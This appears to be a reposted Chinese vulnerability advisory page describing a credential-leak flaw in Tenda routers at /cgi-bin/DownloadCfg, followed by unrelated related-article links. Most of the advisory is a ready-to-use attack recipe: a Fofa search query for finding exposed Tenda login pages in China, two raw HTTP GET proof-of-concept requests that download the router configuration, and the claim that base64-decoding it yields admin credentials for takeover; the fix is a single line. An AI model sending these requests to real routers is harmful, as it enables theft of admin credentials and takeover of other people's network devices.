当前位置: 首页 > article >正文

Tenda路由器 敏感信息泄露

article 2024/11/5 1:54:50

0x01 产品描述:

        Tenda路由器‌是由深圳市吉祥腾达科技有限公司(Tenda)生产的一系列网络通信产品。Tenda路由器以其高性能、高性价比和广泛的应用场景而闻名,适合家庭、办公室和各种网络环境。
0x02 漏洞描述:

        Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。经过base64解码后可登录目标系统从而实现接管。
0x03 搜索语句:

Fofa:title="Tenda | LOGIN" && country="CN"


0x04 漏洞复现:

问题接口:

/cgi-bin/DownloadCfg/RouterCfm.jpg
/cgi-bin/DownloadCfg.jpg

poc1:

GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

 

poc2: 

GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Content-Type: application/json
Host: your-ip


0x05 修复建议:

接口加上权限,且如非必要系统请勿暴露在互联网端。


http://www.kler.cn/a/376733.html

相关文章:

  • docker配置与基础操作
  • Android:ViewPaper动态添加移除第一页
  • 新能源汽车空调压缩机:科技驱动的冷暖核心
  • vue3项目中实现el-table分批渲染表格
  • 2.数组越界访问如何调试HardFault错误
  • 基于SpringBoot+Vue的快递物流信息查询系统设计与实现【前后端分离】
  • FreeRTOS工程编译缺失头文件freertos_mpool.h或freertos_os2.h
  • Leetcode 热题100 之 二叉树3
  • 结合无监督表示学习与伪标签监督的自蒸馏方法,用于稀有疾病影像表型分类的分散感知失衡校正|文献速递-基于生成模型的数据增强与疾病监测应用
  • 从0开始学PHP面向对象内容之(类,对象,构造/析构函数)
  • npm入门教程9:npm配置
  • Python爬虫:揭开淘宝商品描述的神秘面纱
  • 逼着自己深度思考
  • 四款主流的3D创作和游戏开发软件的核心特点和关系
  • 前端 javascript 存储数据的方式有哪些
  • 归并排序速记
  • python 数据结构 2
  • 【云原生】云原生后端:数据管理
  • 设计卷积神经网络CNN为什么不是编程?
  • NFT Insider #153:The Sandbox 推出 Biggie 奇妙宇宙体验,ApeChain 推出顶级交易员游戏
  • 达梦数据库-同义词简介
  • 软考:大数据架构设计
  • 【多态】析构函数的重写
  • 七、MapReduce 编程模型:原理、流程与应用场景
  • 数据结构+算法分析与设计[22-24年真题版]
  • Apache Dubbo (RPC框架)